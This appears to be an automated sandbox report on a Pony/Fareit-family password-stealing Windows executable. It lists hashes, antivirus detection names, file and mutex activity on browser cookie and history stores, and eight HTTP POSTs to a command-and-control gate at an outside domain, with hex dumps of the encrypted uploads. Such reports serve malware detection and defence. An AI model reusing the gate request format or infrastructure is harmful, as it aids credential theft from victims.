Analysis Date2014-11-07 19:30:58
MD54df2bc97ffc68cc603fcc6ba3fc6fa40
SHA1a56584e34a66757e59fc14919d5c02d98031b65e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e55fd83db98efed5568058d8d33cc46d sha1: 27f29e2f3816d2650725e2886121eedd59636036 size: 2048
Section.rdata md5: 995edf1f9d1f6068e49d89ff599d4ccd sha1: 6f725caf8e4c15cf95f9dc559b3042d3dbec5702 size: 3584
Section.orpc md5: 9b096a98627d717a33cb3c28f8373fff sha1: 61367fa3536f43a3af0e67fdbbe4f1215758350c size: 113664
Section.adata md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Timestamp2013-06-16 11:22:34
PEhashba76886dfc18a8c6b27d4cfc0ea2af7018520662
IMPhash8c233171e044bce3d9f29a585aa75007
AV360 SafeTrojan.VIZ.Gen.1
AVAd-AwareTrojan.VIZ.Gen.1
AVAlwil (avast)Kryptik-MSC [Trj]
AVArcabit (arcavir)Trojan.Ransom.Foreign.gxos
AVAuthentiumW32/SuspPack.FP.gen!Eldorado
AVAvira (antivir)TR/Agent.6707251
AVBullGuardTrojan.VIZ.Gen.1
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)TrojanPWS.Zbot.Gen
AVClamAVno_virus
AVDr. WebTrojan.PWS.StealerENT.3128
AVEmsisoftTrojan.VIZ.Gen.1
AVEset (nod32)Win32/Kryptik.BIJW
AVFortinetW32/Kryptik.BDPK!tr
AVFrisk (f-prot)W32/SuspPack.FP.gen!Eldorado
AVF-SecureTrojan.VIZ.Gen.1
AVGrisoft (avg)Cryptic
AVIkarusTrojan-PSW.Win32.Tepfer
AVK7Trojan ( 0040f5a81 )
AVKasperskyTrojan-Ransom.Win32.Foreign.gxos
AVMalwareBytesMalware.Packer.ORPC
AVMcafeePWS-Zbot-FBDS!4DF2BC97FFC6
AVMicrosoft Security EssentialsPWS:Win32/Fareit.gen!C
AVMicroWorld (escan)Trojan.VIZ.Gen.1
AVNormanTrojan.VIZ.Gen.1
AVRisingTrojan.Antii!564B
AVSophosMal/EncPk-ALN
AVSymantecDownloader.Ponik!gen2
AVTrend MicroTROJ_MOSERAN.BMC
AVVirusBlokAda (vba32)Heur.Trojan.Hlux

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\WinRAR\HWID ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNSdennissellsdowntown.com
Type: A
184.168.221.26
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1032 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1035 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1036 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1037 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1038 ➝ 184.168.221.26:80

Raw Pcap
0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .

0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .

0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .

0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .

0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .

0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .

0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .

0x00000000 (00000)   504f5354 202f706f 6e797a2f 67617465   POST /ponyz/gate
0x00000010 (00016)   2e706870 20485454 502f312e 300d0a48   .php HTTP/1.0..H
0x00000020 (00032)   6f73743a 2064656e 6e697373 656c6c73   ost: dennissells
0x00000030 (00048)   646f776e 746f776e 2e636f6d 0d0a4163   downtown.com..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000050 (00080)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000060 (00096)   74697479 2c202a3b 713d300d 0a416363   tity, *;q=0..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000080 (00128)   2d55530d 0a436f6e 74656e74 2d4c656e   -US..Content-Len
0x00000090 (00144)   6774683a 20323735 0d0a436f 6e74656e   gth: 275..Conten
0x000000a0 (00160)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000b0 (00176)   696f6e2f 6f637465 742d7374 7265616d   ion/octet-stream
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436f6e 74656e74 2d456e63   ose..Content-Enc
0x000000e0 (00224)   6f64696e 673a2062 696e6172 790d0a55   oding: binary..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000130 (00304)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x00000140 (00320)   35303732 37290d0a 0d0aff2f a3f569bb   50727)...../..i.
0x00000150 (00336)   ddab1fc9 5752d9f9 7533a319 be77c7fe   ....WR..u3...w..
0x00000160 (00352)   ef4c92cf 3ede45d0 c08e234a 44e0f9d8   .L..>.E...#JD...
0x00000170 (00368)   a3c875eb b2b59b5d 918f52da d07c33ce   ..u....]..R..|3.
0x00000180 (00384)   860d5442 c6524f20 4a932936 82908f8d   ..TB.RO J.)6....
0x00000190 (00400)   99c82008 24f28c1c b993cd34 323cf696   .. .$......42<..
0x000001a0 (00416)   9c                                    .


Strings
..
c
Q
.
,
]O/.+.
9
<1p@^g
-;1w\E
^_.29t R
,2fGdL
	)2 G!
,3Y%~F
4gy :6
>4_xy1
?@58Ypn
6}jJv7
6l<Xqj
72v9Ub
7eFdX6
8Na^ZP
9F=i-f
.9PsR;e
,9Xt 3
a\}{8w
.adata
a`Fq$P
A`^OeD
.a;RqG
.=A?Vr
~_,/bC
bEl4Y=
BGVl1X
bIv3Kj
CreateFileMappingW
CreateMailslotA
CreatePipe
CreateSemaphoreW
c;[y-D
D$!?8I
DD ]^V
DeleteFileA
DeviceIoControl
D$k^b65
DllEnumClassObjects
dp<E4W,
DVD&9pp
@$|eL.
e\VM%?
 eZ_;A
FatalExit
~:ff'o
f@GLr&'_Cj
Fg;!Z{
?F"lxGf
FyP:{[
&g3M',
GetACP
GetConsoleAliasA
GetModuleHandleW
GetProcessHeap
GetShortPathNameW
GetStringTypeW
GfQx)Ma
G'FSFo
)Gh4Px
gJv:(HL
'.gOQRs
GVm:>q
hCn>rE
	h@Eg:
I4PV]n06
InitializeCriticalSection
jik4Pv5
jKa* 6yH
(j]+VM$6
K8lB e
KERNEL32.dll
l@+G'W
l#JkdK
LoadLibraryA
m~*9@>
MSHTML.dll
>MY0A2
N3g%bS
nOQ5Z{
.NPX)7L
+n sjpe
o<6A3f
oJ%AS<
oN90z[
oN-:z[
[P!4EJ
!PK:;}V
q]/\/D
(QGj>,
Q*H.TH(
qsSMrM
`.rdata
r{uU\U
Ryp+df
SetCurrentDirectoryA
SetEnvironmentVariableA
SetVolumeLabelW
 S,f&S
SGgC=J?
ShowHTMLDialog
ShowModalDialog
ShowModelessHTMLDialog
Srd$:opB
This program must be run under Win32
?Ti}K`
!(To[?#"
,/T=v?s
u!g-wZ
Ui=>9c
&`UJ{/!
UL	]'	(
uT_&cB
uu !Y6cr
VirtualAlloc
Vw5|*1
[vZn<X
wlp`K*
WriteConsoleW
Wu%yFg
XkBO20<
Xy7YEd
Yb]B	6>
yX$UMh
yX+X#2
[zfSwc8
Zkx[Hi
]	Zqnk
ZX<C.~*E
z+ZBZX)r